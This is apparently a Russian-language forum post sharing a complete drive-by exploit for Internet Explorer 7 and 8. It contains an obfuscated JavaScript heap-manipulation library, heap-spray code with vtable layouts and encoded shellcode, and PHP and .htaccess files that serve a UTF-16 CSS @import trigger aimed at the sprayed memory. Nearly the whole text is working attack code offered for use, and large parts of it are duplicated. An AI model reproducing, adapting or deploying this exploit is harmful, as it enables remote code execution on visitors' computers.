вот делал под ие7-8, без обхода депа через NET2.0.
основной код:
IE7:
IE8:
utf.php
.htaccess
css.php
основной код:
function dKoYceWdi() {
}
dKoYceWdi.hEIAWeqkQfxY = function(maxAlloc, heapBase) {
this.maxAlloc = (maxAlloc ? maxAlloc : 65535);
this.heapBase = (heapBase ? heapBase : 0x150000);
this.NETZjoYvfZdvXqiRMTVpH = "AAAA";
while (4 + this.NETZjoYvfZdvXqiRMTVpH.length*2 + 2 < this.maxAlloc) {
this.NETZjoYvfZdvXqiRMTVpH += this.NETZjoYvfZdvXqiRMTVpH;
}
this.mem = new Array();
this.HdKblZOtccRYKLUXReW();
}
dKoYceWdi.hEIAWeqkQfxY.prototype.OTvoUqKH = function(msg) {
void(Math.atan2(0xbabe, msg));
}
dKoYceWdi.hEIAWeqkQfxY.prototype.u = function(enable) {
if (enable == true)
void(Math.atan(0xbabe));
else
void(Math.asin(0xbabe));
}
dKoYceWdi.hEIAWeqkQfxY.prototype.iEKfXewEQKTlKbObDc = function(msg) {
void(Math.acos(0xbabe));
}
dKoYceWdi.hEIAWeqkQfxY.prototype.NVQPiTlfMmsicOlDBURHLErMAvNjmDei = function(len) {
if (len > this.NETZjoYvfZdvXqiRMTVpH.length)
throw "Requested NVQPiTlfMmsicOlDBURHLErMAvNjmDei string length " + len + ", only " + this.NETZjoYvfZdvXqiRMTVpH.length + " available";
return this.NETZjoYvfZdvXqiRMTVpH.substr(0, len);
}
dKoYceWdi.hEIAWeqkQfxY.prototype.OAVCHJeYLy = function(num, OAVCHJeYLy) {
if (OAVCHJeYLy == 0)
throw "Round argument cannot be 0";
return parseInt((num + (OAVCHJeYLy-1)) / OAVCHJeYLy) * OAVCHJeYLy;
}
dKoYceWdi.hEIAWeqkQfxY.prototype.ugbbzVyLSFeeqCgOijbKTMHdbUnnW = function(num, width)
{
var digits = "0123456789ABCDEF";
var ugbbzVyLSFeeqCgOijbKTMHdbUnnW = digits.substr(num & 0xF, 1);
while (num > 0xF) {
num = num >>> 4;
ugbbzVyLSFeeqCgOijbKTMHdbUnnW = digits.substr(num & 0xF, 1) + ugbbzVyLSFeeqCgOijbKTMHdbUnnW;
}
var width = (width ? width : 0);
while (ugbbzVyLSFeeqCgOijbKTMHdbUnnW.length < width)
ugbbzVyLSFeeqCgOijbKTMHdbUnnW = "0" + ugbbzVyLSFeeqCgOijbKTMHdbUnnW;
return ugbbzVyLSFeeqCgOijbKTMHdbUnnW;
}
dKoYceWdi.hEIAWeqkQfxY.prototype.FhABckODp = function(FhABckODp) {
return unescape("%u" + this.ugbbzVyLSFeeqCgOijbKTMHdbUnnW(FhABckODp & 0xFFFF, 4) + "%u" + this.ugbbzVyLSFeeqCgOijbKTMHdbUnnW((FhABckODp >> 16) & 0xFFFF, 4));
}
dKoYceWdi.hEIAWeqkQfxY.prototype.oQIncDbP = function(arg, tag) {
var size;
if (typeof arg == "string" || arg instanceof String)
size = 4 + arg.length*2 + 2;
else
size = arg;
if ((size & 0xf) != 0)
throw "Allocation size " + size + " must be a multiple of 16";
if (this.mem[tag] === undefined)
this.mem[tag] = new Array();
if (typeof arg == "string" || arg instanceof String) {
this.mem[tag].push(arg.substr(0, arg.length));
}
else {
this.mem[tag].push(this.NVQPiTlfMmsicOlDBURHLErMAvNjmDei((arg-6)/2));
}
}
dKoYceWdi.hEIAWeqkQfxY.prototype.MxqwJOtisWewUSizjsIlnyZTgN = function(tag) {
delete this.mem[tag];
CollectGarbage();
}
dKoYceWdi.hEIAWeqkQfxY.prototype.HdKblZOtccRYKLUXReW = function() {
this.OTvoUqKH("Flushing the OLEAUT32 cache");
this.MxqwJOtisWewUSizjsIlnyZTgN("oleaut32");
for (var i = 0; i < 6; i++) {
this.oQIncDbP(32, "oleaut32");
this.oQIncDbP(64, "oleaut32");
this.oQIncDbP(256, "oleaut32");
this.oQIncDbP(32768, "oleaut32");
}
}
dKoYceWdi.hEIAWeqkQfxY.prototype.ISKbhWtKEPROiZZiHGSCQ = function(arg, tag) {
var size;
if (typeof arg == "string" || arg instanceof String)
size = 4 + arg.length*2 + 2;
else
size = arg;
if (size == 32 || size == 64 || size == 256 || size == 32768)
throw "Allocation sizes " + size + " cannot be flushed out of the OLEAUT32 cache";
this.oQIncDbP(arg, tag);
}
dKoYceWdi.hEIAWeqkQfxY.prototype.gNz = function(tag) {
this.MxqwJOtisWewUSizjsIlnyZTgN(tag);
this.HdKblZOtccRYKLUXReW();
}
dKoYceWdi.hEIAWeqkQfxY.prototype.lShRAHuECPTMCuMHrKJ = function() {
this.OTvoUqKH("Running the garbage collector");
CollectGarbage();
this.HdKblZOtccRYKLUXReW();
}
dKoYceWdi.hEIAWeqkQfxY.prototype.gnUzNdeypofkDcuRkplPKXC = function(arg, count) {
var count = (count ? count : 1);
for (var i = 0; i < count; i++) {
this.ISKbhWtKEPROiZZiHGSCQ(arg);
this.ISKbhWtKEPROiZZiHGSCQ(arg, "gnUzNdeypofkDcuRkplPKXC");
}
this.ISKbhWtKEPROiZZiHGSCQ(arg);
this.gNz("gnUzNdeypofkDcuRkplPKXC");
}
dKoYceWdi.hEIAWeqkQfxY.prototype.PRsdnUGLcA = function(arg, count) {
var size;
if (typeof arg == "string" || arg instanceof String)
size = 4 + arg.length*2 + 2;
else
size = arg;
if ((size & 0xf) != 0)
throw "Allocation size " + size + " must be a multiple of 16";
if (size+8 >= 1024)
throw("Maximum PRsdnUGLcA block size is 1008 bytes");
var count = (count ? count : 1);
for (var i = 0; i < count; i++)
this.ISKbhWtKEPROiZZiHGSCQ(arg, "PRsdnUGLcA");
this.gNz("PRsdnUGLcA");
}
dKoYceWdi.hEIAWeqkQfxY.prototype.PCDwQTxkrwE = function(arg)
{
var size;
if (typeof arg == "string" || arg instanceof String)
size = 4 + arg.length*2 + 2;
else
size = arg;
if ((size & 0xf) != 0)
throw "Allocation size " + size + " must be a multiple of 16";
if (size+8 >= 1024)
throw("Maximum PRsdnUGLcA block size is 1008 bytes");
return this.heapBase + 0x688 + ((size+8)/8)*48;
}
dKoYceWdi.hEIAWeqkQfxY.prototype.jnWdIcLNTenPKlIfrYRthrunPBs = function(shellcode, jmpecx, size) {
var size = (size ? size : 1008);
if ((size & 0xf) != 0)
throw "Vtable size " + size + " must be a multiple of 16";
if (shellcode.length*2 > size-138)
throw("Maximum shellcode length is " + (size-138) + " bytes");
var jnWdIcLNTenPKlIfrYRthrunPBs = unescape("%u9090%u7ceb")
for (var i = 0; i < 124/4; i++)
jnWdIcLNTenPKlIfrYRthrunPBs += this.FhABckODp(jmpecx);
jnWdIcLNTenPKlIfrYRthrunPBs += unescape("%u0028%u0028") +
shellcode + heap.NVQPiTlfMmsicOlDBURHLErMAvNjmDei((size-138)/2 - shellcode.length);
return jnWdIcLNTenPKlIfrYRthrunPBs;
}
function go_css(){
var vlink = document.createElement("iframe");
vlink.setAttribute("src", "utf.php");
document.getElementsByTagName("head")[0].appendChild(vlink);
}
}
dKoYceWdi.hEIAWeqkQfxY = function(maxAlloc, heapBase) {
this.maxAlloc = (maxAlloc ? maxAlloc : 65535);
this.heapBase = (heapBase ? heapBase : 0x150000);
this.NETZjoYvfZdvXqiRMTVpH = "AAAA";
while (4 + this.NETZjoYvfZdvXqiRMTVpH.length*2 + 2 < this.maxAlloc) {
this.NETZjoYvfZdvXqiRMTVpH += this.NETZjoYvfZdvXqiRMTVpH;
}
this.mem = new Array();
this.HdKblZOtccRYKLUXReW();
}
dKoYceWdi.hEIAWeqkQfxY.prototype.OTvoUqKH = function(msg) {
void(Math.atan2(0xbabe, msg));
}
dKoYceWdi.hEIAWeqkQfxY.prototype.u = function(enable) {
if (enable == true)
void(Math.atan(0xbabe));
else
void(Math.asin(0xbabe));
}
dKoYceWdi.hEIAWeqkQfxY.prototype.iEKfXewEQKTlKbObDc = function(msg) {
void(Math.acos(0xbabe));
}
dKoYceWdi.hEIAWeqkQfxY.prototype.NVQPiTlfMmsicOlDBURHLErMAvNjmDei = function(len) {
if (len > this.NETZjoYvfZdvXqiRMTVpH.length)
throw "Requested NVQPiTlfMmsicOlDBURHLErMAvNjmDei string length " + len + ", only " + this.NETZjoYvfZdvXqiRMTVpH.length + " available";
return this.NETZjoYvfZdvXqiRMTVpH.substr(0, len);
}
dKoYceWdi.hEIAWeqkQfxY.prototype.OAVCHJeYLy = function(num, OAVCHJeYLy) {
if (OAVCHJeYLy == 0)
throw "Round argument cannot be 0";
return parseInt((num + (OAVCHJeYLy-1)) / OAVCHJeYLy) * OAVCHJeYLy;
}
dKoYceWdi.hEIAWeqkQfxY.prototype.ugbbzVyLSFeeqCgOijbKTMHdbUnnW = function(num, width)
{
var digits = "0123456789ABCDEF";
var ugbbzVyLSFeeqCgOijbKTMHdbUnnW = digits.substr(num & 0xF, 1);
while (num > 0xF) {
num = num >>> 4;
ugbbzVyLSFeeqCgOijbKTMHdbUnnW = digits.substr(num & 0xF, 1) + ugbbzVyLSFeeqCgOijbKTMHdbUnnW;
}
var width = (width ? width : 0);
while (ugbbzVyLSFeeqCgOijbKTMHdbUnnW.length < width)
ugbbzVyLSFeeqCgOijbKTMHdbUnnW = "0" + ugbbzVyLSFeeqCgOijbKTMHdbUnnW;
return ugbbzVyLSFeeqCgOijbKTMHdbUnnW;
}
dKoYceWdi.hEIAWeqkQfxY.prototype.FhABckODp = function(FhABckODp) {
return unescape("%u" + this.ugbbzVyLSFeeqCgOijbKTMHdbUnnW(FhABckODp & 0xFFFF, 4) + "%u" + this.ugbbzVyLSFeeqCgOijbKTMHdbUnnW((FhABckODp >> 16) & 0xFFFF, 4));
}
dKoYceWdi.hEIAWeqkQfxY.prototype.oQIncDbP = function(arg, tag) {
var size;
if (typeof arg == "string" || arg instanceof String)
size = 4 + arg.length*2 + 2;
else
size = arg;
if ((size & 0xf) != 0)
throw "Allocation size " + size + " must be a multiple of 16";
if (this.mem[tag] === undefined)
this.mem[tag] = new Array();
if (typeof arg == "string" || arg instanceof String) {
this.mem[tag].push(arg.substr(0, arg.length));
}
else {
this.mem[tag].push(this.NVQPiTlfMmsicOlDBURHLErMAvNjmDei((arg-6)/2));
}
}
dKoYceWdi.hEIAWeqkQfxY.prototype.MxqwJOtisWewUSizjsIlnyZTgN = function(tag) {
delete this.mem[tag];
CollectGarbage();
}
dKoYceWdi.hEIAWeqkQfxY.prototype.HdKblZOtccRYKLUXReW = function() {
this.OTvoUqKH("Flushing the OLEAUT32 cache");
this.MxqwJOtisWewUSizjsIlnyZTgN("oleaut32");
for (var i = 0; i < 6; i++) {
this.oQIncDbP(32, "oleaut32");
this.oQIncDbP(64, "oleaut32");
this.oQIncDbP(256, "oleaut32");
this.oQIncDbP(32768, "oleaut32");
}
}
dKoYceWdi.hEIAWeqkQfxY.prototype.ISKbhWtKEPROiZZiHGSCQ = function(arg, tag) {
var size;
if (typeof arg == "string" || arg instanceof String)
size = 4 + arg.length*2 + 2;
else
size = arg;
if (size == 32 || size == 64 || size == 256 || size == 32768)
throw "Allocation sizes " + size + " cannot be flushed out of the OLEAUT32 cache";
this.oQIncDbP(arg, tag);
}
dKoYceWdi.hEIAWeqkQfxY.prototype.gNz = function(tag) {
this.MxqwJOtisWewUSizjsIlnyZTgN(tag);
this.HdKblZOtccRYKLUXReW();
}
dKoYceWdi.hEIAWeqkQfxY.prototype.lShRAHuECPTMCuMHrKJ = function() {
this.OTvoUqKH("Running the garbage collector");
CollectGarbage();
this.HdKblZOtccRYKLUXReW();
}
dKoYceWdi.hEIAWeqkQfxY.prototype.gnUzNdeypofkDcuRkplPKXC = function(arg, count) {
var count = (count ? count : 1);
for (var i = 0; i < count; i++) {
this.ISKbhWtKEPROiZZiHGSCQ(arg);
this.ISKbhWtKEPROiZZiHGSCQ(arg, "gnUzNdeypofkDcuRkplPKXC");
}
this.ISKbhWtKEPROiZZiHGSCQ(arg);
this.gNz("gnUzNdeypofkDcuRkplPKXC");
}
dKoYceWdi.hEIAWeqkQfxY.prototype.PRsdnUGLcA = function(arg, count) {
var size;
if (typeof arg == "string" || arg instanceof String)
size = 4 + arg.length*2 + 2;
else
size = arg;
if ((size & 0xf) != 0)
throw "Allocation size " + size + " must be a multiple of 16";
if (size+8 >= 1024)
throw("Maximum PRsdnUGLcA block size is 1008 bytes");
var count = (count ? count : 1);
for (var i = 0; i < count; i++)
this.ISKbhWtKEPROiZZiHGSCQ(arg, "PRsdnUGLcA");
this.gNz("PRsdnUGLcA");
}
dKoYceWdi.hEIAWeqkQfxY.prototype.PCDwQTxkrwE = function(arg)
{
var size;
if (typeof arg == "string" || arg instanceof String)
size = 4 + arg.length*2 + 2;
else
size = arg;
if ((size & 0xf) != 0)
throw "Allocation size " + size + " must be a multiple of 16";
if (size+8 >= 1024)
throw("Maximum PRsdnUGLcA block size is 1008 bytes");
return this.heapBase + 0x688 + ((size+8)/8)*48;
}
dKoYceWdi.hEIAWeqkQfxY.prototype.jnWdIcLNTenPKlIfrYRthrunPBs = function(shellcode, jmpecx, size) {
var size = (size ? size : 1008);
if ((size & 0xf) != 0)
throw "Vtable size " + size + " must be a multiple of 16";
if (shellcode.length*2 > size-138)
throw("Maximum shellcode length is " + (size-138) + " bytes");
var jnWdIcLNTenPKlIfrYRthrunPBs = unescape("%u9090%u7ceb")
for (var i = 0; i < 124/4; i++)
jnWdIcLNTenPKlIfrYRthrunPBs += this.FhABckODp(jmpecx);
jnWdIcLNTenPKlIfrYRthrunPBs += unescape("%u0028%u0028") +
shellcode + heap.NVQPiTlfMmsicOlDBURHLErMAvNjmDei((size-138)/2 - shellcode.length);
return jnWdIcLNTenPKlIfrYRthrunPBs;
}
function go_css(){
var vlink = document.createElement("iframe");
vlink.setAttribute("src", "utf.php");
document.getElementsByTagName("head")[0].appendChild(vlink);
}
IE7:
function gogogo() {
heap = new dKoYceWdi.hEIAWeqkQfxY(0x20000);
var heapspray = unescape(""+
/*ecx+0x00*/ "%ue020%u105a"+
/*ecx+0x04*/ "%u9999%u9999"+
/*ecx+0x08*/ "%ue020%u105a"+
/*ecx+0x0c*/ "%u8888%u8888"+
/*ecx+0x10*/ "%ue020%u105a"+ /*ESI*/
/*ecx+0x14*/ "%u0001%u0000"+
/*ecx+0x18*/ "%u0100%u0000"+ /*const*/
/*ecx+0x1c*/ "%ue020%u105a"+ /*const*/
/*ecx+0x20*/ "%ue088%u105a"+ /*const*/
/*ecx+0x24*/ "%u9999%u9999"+ /* goto to edx*/
/*ecx+0x28*/ "%u5555%u9999"+
/*ecx+0x2c*/ "%u9944%u9999"+
/*ecx+0x30*/ "%u9933%u9999"+ /* EAX */
/*ecx+0x34*/ "%u0002%u0000"+
/*ecx+0x38*/ "%u9922%u9999"+
/*ecx+0x3c*/ "%u9911%u9999"+
/*ecx+0x40*/ "%u9999%u9999"+
/*ecx+0x44*/ "%u9999%u9999"+
/*ecx+0x48*/ "%u9999%u9999"+
/*ecx+0x4c*/ "%u9999%u9999"+
/*ecx+0x50*/ "%u9999%u9999"+
/*ecx+0x54*/ "%u9999%u9999"+ /*const*/
/*ecx+0x58*/ "%u9999%u9999"+
/*ecx+0x5c*/ "%ue025%u105a"+
/*ecx+0x60*/ "%ue044%u105a"+ /**/
/*ecx+0x64*/ "%ue082%u105a"+ /**/
/*ecx+0x68*/ "%ue06c%u105a"+ /*its on EDX*/
/*ecx+0x6c*/ "%ue090%u105a"+/*goto scode*/
/*ecx+0x70*/ /*shellcode*/
"%ucada%ub6bd%uaaad%ud94a%u2474%u29f4%ub1c9%u5e33%uee83%u31fc%u136e%ud803%u48be%ud8bf%u0529%u2040%u76aa%uc5c8%ua49b%u8eae%u788e%uc2a4%uf222%uf6e8%u76b1%uf925%u3c72%u3413%uf082%u9a9b%u9240%ue067%u7494%u2b59%u75e9%u519e%u2702%u1e77%ud8b1%u62fc%ud80a%ue9d2%ua232%u2d57%u18c6%u7d59%u1677%u6511%u70f3%u9482%u62d0%udffe%u505d%ude74%ua8b7%ud175%u67f7%ude48%u76f5%ud88c%u0ce5%u1be6%u169b%u663d%u9247%uc0a0%u040c%uf101%ud3c1%ufdc2%u90ae%ue18d%u7431%u1da6%u7bb9%u9469%u5ff9%ufdad%uc15a%u5bf4%ufe0c%u03e7%u5af1%ua163%udde6%uaf2e%u6cf9%u9655%u6efa%ub856%u5f92%u57dd%u5fe4%u1c34%u2a1a%u3415%uf3b3%u05cf%u03de%u493a%u87e7%u31cf%u971c%u34a5%u1f58%u4455%ucaf1%ufb59%udef2%u9a39%u8260%u3993%u2101%u41ec");
while(heapspray.length < 0x1000) heapspray += unescape("%u4444");
var heapblock = heapspray;
while(heapblock.length < 0x40000) heapblock += heapblock;
finalspray = heapblock.substring(2, 0x40000 - 0x21);
for(var counter = 0; counter < 500; counter++) { heap.ISKbhWtKEPROiZZiHGSCQ(finalspray); }
go_css();
}
gogogo();
heap = new dKoYceWdi.hEIAWeqkQfxY(0x20000);
var heapspray = unescape(""+
/*ecx+0x00*/ "%ue020%u105a"+
/*ecx+0x04*/ "%u9999%u9999"+
/*ecx+0x08*/ "%ue020%u105a"+
/*ecx+0x0c*/ "%u8888%u8888"+
/*ecx+0x10*/ "%ue020%u105a"+ /*ESI*/
/*ecx+0x14*/ "%u0001%u0000"+
/*ecx+0x18*/ "%u0100%u0000"+ /*const*/
/*ecx+0x1c*/ "%ue020%u105a"+ /*const*/
/*ecx+0x20*/ "%ue088%u105a"+ /*const*/
/*ecx+0x24*/ "%u9999%u9999"+ /* goto to edx*/
/*ecx+0x28*/ "%u5555%u9999"+
/*ecx+0x2c*/ "%u9944%u9999"+
/*ecx+0x30*/ "%u9933%u9999"+ /* EAX */
/*ecx+0x34*/ "%u0002%u0000"+
/*ecx+0x38*/ "%u9922%u9999"+
/*ecx+0x3c*/ "%u9911%u9999"+
/*ecx+0x40*/ "%u9999%u9999"+
/*ecx+0x44*/ "%u9999%u9999"+
/*ecx+0x48*/ "%u9999%u9999"+
/*ecx+0x4c*/ "%u9999%u9999"+
/*ecx+0x50*/ "%u9999%u9999"+
/*ecx+0x54*/ "%u9999%u9999"+ /*const*/
/*ecx+0x58*/ "%u9999%u9999"+
/*ecx+0x5c*/ "%ue025%u105a"+
/*ecx+0x60*/ "%ue044%u105a"+ /**/
/*ecx+0x64*/ "%ue082%u105a"+ /**/
/*ecx+0x68*/ "%ue06c%u105a"+ /*its on EDX*/
/*ecx+0x6c*/ "%ue090%u105a"+/*goto scode*/
/*ecx+0x70*/ /*shellcode*/
"%ucada%ub6bd%uaaad%ud94a%u2474%u29f4%ub1c9%u5e33%uee83%u31fc%u136e%ud803%u48be%ud8bf%u0529%u2040%u76aa%uc5c8%ua49b%u8eae%u788e%uc2a4%uf222%uf6e8%u76b1%uf925%u3c72%u3413%uf082%u9a9b%u9240%ue067%u7494%u2b59%u75e9%u519e%u2702%u1e77%ud8b1%u62fc%ud80a%ue9d2%ua232%u2d57%u18c6%u7d59%u1677%u6511%u70f3%u9482%u62d0%udffe%u505d%ude74%ua8b7%ud175%u67f7%ude48%u76f5%ud88c%u0ce5%u1be6%u169b%u663d%u9247%uc0a0%u040c%uf101%ud3c1%ufdc2%u90ae%ue18d%u7431%u1da6%u7bb9%u9469%u5ff9%ufdad%uc15a%u5bf4%ufe0c%u03e7%u5af1%ua163%udde6%uaf2e%u6cf9%u9655%u6efa%ub856%u5f92%u57dd%u5fe4%u1c34%u2a1a%u3415%uf3b3%u05cf%u03de%u493a%u87e7%u31cf%u971c%u34a5%u1f58%u4455%ucaf1%ufb59%udef2%u9a39%u8260%u3993%u2101%u41ec");
while(heapspray.length < 0x1000) heapspray += unescape("%u4444");
var heapblock = heapspray;
while(heapblock.length < 0x40000) heapblock += heapblock;
finalspray = heapblock.substring(2, 0x40000 - 0x21);
for(var counter = 0; counter < 500; counter++) { heap.ISKbhWtKEPROiZZiHGSCQ(finalspray); }
go_css();
}
gogogo();
IE8:
function gogogo() {
heap = new dKoYceWdi.hEIAWeqkQfxY(0x20000);
var heapspray = unescape(""+
/*ecx+0x00*/ "%ue020%u105a"+
/*ecx+0x04*/ "%u9999%u9999"+
/*ecx+0x08*/ "%u9999%u9999"+
/*ecx+0x0c*/ "%u9999%u9999"+
/*ecx+0x10*/ "%u9999%u9999"+
/*ecx+0x14*/ "%u9999%u9999"+
/*ecx+0x18*/ "%u0001%u0000"+ /*const*/
/*ecx+0x1c*/ "%u0100%u0000"+ /*const*/
/*ecx+0x20*/ "%ue020%u105a"+ /*const*/
/*ecx+0x24*/ "%ue088%u105a"+ /* goto to edx*/
/*ecx+0x28*/ "%u9999%u9999"+
/*ecx+0x2c*/ "%u9999%u9999"+
/*ecx+0x30*/ "%ue020%u105a"+ /* EAX */
/*ecx+0x34*/ "%u9999%u9999"+
/*ecx+0x38*/ "%u9999%u9999"+
/*ecx+0x3c*/ "%u9999%u9999"+
/*ecx+0x40*/ "%u9999%u9999"+
/*ecx+0x44*/ "%u9999%u9999"+
/*ecx+0x48*/ "%u9999%u9999"+
/*ecx+0x4c*/ "%u9999%u9999"+
/*ecx+0x50*/ "%u9999%u9999"+
/*ecx+0x54*/ "%u0100%u0000"+ /*const*/
/*ecx+0x58*/ "%u9999%u9999"+
/*ecx+0x5c*/ "%u9999%u9999"+
/*ecx+0x60*/ "%ue044%u105a"+ /**/
/*ecx+0x64*/ "%ue082%u105a"+ /**/
/*ecx+0x68*/ "%ue06c%u105a"+ /*its on EDX*/
/*ecx+0x6c*/ "%ue090%u105a"+/*goto scode*/
/*ecx+0x70*/ /*shellcode*/
"%ucada%ub6bd%uaaad%ud94a%u2474%u29f4%ub1c9%u5e33%uee83%u31fc%u136e%ud803%u48be%ud8bf%u0529%u2040%u76aa%uc5c8%ua49b%u8eae%u788e%uc2a4%uf222%uf6e8%u76b1%uf925%u3c72%u3413%uf082%u9a9b%u9240%ue067%u7494%u2b59%u75e9%u519e%u2702%u1e77%ud8b1%u62fc%ud80a%ue9d2%ua232%u2d57%u18c6%u7d59%u1677%u6511%u70f3%u9482%u62d0%udffe%u505d%ude74%ua8b7%ud175%u67f7%ude48%u76f5%ud88c%u0ce5%u1be6%u169b%u663d%u9247%uc0a0%u040c%uf101%ud3c1%ufdc2%u90ae%ue18d%u7431%u1da6%u7bb9%u9469%u5ff9%ufdad%uc15a%u5bf4%ufe0c%u03e7%u5af1%ua163%udde6%uaf2e%u6cf9%u9655%u6efa%ub856%u5f92%u57dd%u5fe4%u1c34%u2a1a%u3415%uf3b3%u05cf%u03de%u493a%u87e7%u31cf%u971c%u34a5%u1f58%u4455%ucaf1%ufb59%udef2%u9a39%u8260%u3993%u2101%u41ec");
while(heapspray.length < 0x1000) heapspray += unescape("%u4444");
var heapblock = heapspray;
while(heapblock.length < 0x40000) heapblock += heapblock;
finalspray = heapblock.substring(2, 0x40000 - 0x21);
for(var counter = 0; counter < 500; counter++) { heap.ISKbhWtKEPROiZZiHGSCQ(finalspray); }
go_css();
}
gogogo();
heap = new dKoYceWdi.hEIAWeqkQfxY(0x20000);
var heapspray = unescape(""+
/*ecx+0x00*/ "%ue020%u105a"+
/*ecx+0x04*/ "%u9999%u9999"+
/*ecx+0x08*/ "%u9999%u9999"+
/*ecx+0x0c*/ "%u9999%u9999"+
/*ecx+0x10*/ "%u9999%u9999"+
/*ecx+0x14*/ "%u9999%u9999"+
/*ecx+0x18*/ "%u0001%u0000"+ /*const*/
/*ecx+0x1c*/ "%u0100%u0000"+ /*const*/
/*ecx+0x20*/ "%ue020%u105a"+ /*const*/
/*ecx+0x24*/ "%ue088%u105a"+ /* goto to edx*/
/*ecx+0x28*/ "%u9999%u9999"+
/*ecx+0x2c*/ "%u9999%u9999"+
/*ecx+0x30*/ "%ue020%u105a"+ /* EAX */
/*ecx+0x34*/ "%u9999%u9999"+
/*ecx+0x38*/ "%u9999%u9999"+
/*ecx+0x3c*/ "%u9999%u9999"+
/*ecx+0x40*/ "%u9999%u9999"+
/*ecx+0x44*/ "%u9999%u9999"+
/*ecx+0x48*/ "%u9999%u9999"+
/*ecx+0x4c*/ "%u9999%u9999"+
/*ecx+0x50*/ "%u9999%u9999"+
/*ecx+0x54*/ "%u0100%u0000"+ /*const*/
/*ecx+0x58*/ "%u9999%u9999"+
/*ecx+0x5c*/ "%u9999%u9999"+
/*ecx+0x60*/ "%ue044%u105a"+ /**/
/*ecx+0x64*/ "%ue082%u105a"+ /**/
/*ecx+0x68*/ "%ue06c%u105a"+ /*its on EDX*/
/*ecx+0x6c*/ "%ue090%u105a"+/*goto scode*/
/*ecx+0x70*/ /*shellcode*/
"%ucada%ub6bd%uaaad%ud94a%u2474%u29f4%ub1c9%u5e33%uee83%u31fc%u136e%ud803%u48be%ud8bf%u0529%u2040%u76aa%uc5c8%ua49b%u8eae%u788e%uc2a4%uf222%uf6e8%u76b1%uf925%u3c72%u3413%uf082%u9a9b%u9240%ue067%u7494%u2b59%u75e9%u519e%u2702%u1e77%ud8b1%u62fc%ud80a%ue9d2%ua232%u2d57%u18c6%u7d59%u1677%u6511%u70f3%u9482%u62d0%udffe%u505d%ude74%ua8b7%ud175%u67f7%ude48%u76f5%ud88c%u0ce5%u1be6%u169b%u663d%u9247%uc0a0%u040c%uf101%ud3c1%ufdc2%u90ae%ue18d%u7431%u1da6%u7bb9%u9469%u5ff9%ufdad%uc15a%u5bf4%ufe0c%u03e7%u5af1%ua163%udde6%uaf2e%u6cf9%u9655%u6efa%ub856%u5f92%u57dd%u5fe4%u1c34%u2a1a%u3415%uf3b3%u05cf%u03de%u493a%u87e7%u31cf%u971c%u34a5%u1f58%u4455%ucaf1%ufb59%udef2%u9a39%u8260%u3993%u2101%u41ec");
while(heapspray.length < 0x1000) heapspray += unescape("%u4444");
var heapblock = heapspray;
while(heapblock.length < 0x40000) heapblock += heapblock;
finalspray = heapblock.substring(2, 0x40000 - 0x21);
for(var counter = 0; counter < 500; counter++) { heap.ISKbhWtKEPROiZZiHGSCQ(finalspray); }
go_css();
}
gogogo();
utf.php
<?
function du($str){
$strlength = strlen($str);
for($i=0; $i<$strlength; $i++){
$returnval .= substr($str, $i, 1)."\x00";
}
return $returnval;
}
$css =
<<<css
var vlink = document.createElement("link");
vlink.setAttribute("rel", "Stylesheet");
vlink.setAttribute("type", "text/css");
vlink.setAttribute("href", "
css;
$css2 =
<<<css2
");
document.getElementsByTagName("head")[0].appendChild(vlink);
css2;
$ret = "\x20\xe0\x5a\x10\x20\xe0\x5a\x10\x20\xe0\x5a\x10\x20\xe0\x5a\x10";
$exp = du($css).$ret.du($css2);
echo "\xff\xfe";
echo du("<html><head></head><body><script>").$exp.du("</script>");
die;
?>
function du($str){
$strlength = strlen($str);
for($i=0; $i<$strlength; $i++){
$returnval .= substr($str, $i, 1)."\x00";
}
return $returnval;
}
$css =
<<<css
var vlink = document.createElement("link");
vlink.setAttribute("rel", "Stylesheet");
vlink.setAttribute("type", "text/css");
vlink.setAttribute("href", "
css;
$css2 =
<<<css2
");
document.getElementsByTagName("head")[0].appendChild(vlink);
css2;
$ret = "\x20\xe0\x5a\x10\x20\xe0\x5a\x10\x20\xe0\x5a\x10\x20\xe0\x5a\x10";
$exp = du($css).$ret.du($css2);
echo "\xff\xfe";
echo du("<html><head></head><body><script>").$exp.du("</script>");
die;
?>
.htaccess
ErrorDocument 404 http://domain.com/css.php
css.php
<?
function du($str){
$strlength = strlen($str);
for($i=0; $i<$strlength; $i++){
$returnval .= substr($str, $i, 1)."\x00";
}
return $returnval;
}
$css =
<<<css
@import url("
css;
$css2 =
<<<css2
");
css2;
$ret = "\x20\xe0\x5a\x10\x20\xe0\x5a\x10\x20\xe0\x5a\x10\x20\xe0\x5a\x10";
$exp = du($css).$ret.du($css2).du($css).$ret.du($css2).du($css).$ret.du($css2).du($css).$ret.du($css2);
echo "\xff\xfe";
echo $exp;
die;
?>
function du($str){
$strlength = strlen($str);
for($i=0; $i<$strlength; $i++){
$returnval .= substr($str, $i, 1)."\x00";
}
return $returnval;
}
$css =
<<<css
@import url("
css;
$css2 =
<<<css2
");
css2;
$ret = "\x20\xe0\x5a\x10\x20\xe0\x5a\x10\x20\xe0\x5a\x10\x20\xe0\x5a\x10";
$exp = du($css).$ret.du($css2).du($css).$ret.du($css2).du($css).$ret.du($css2).du($css).$ret.du($css2);
echo "\xff\xfe";
echo $exp;
die;
?>
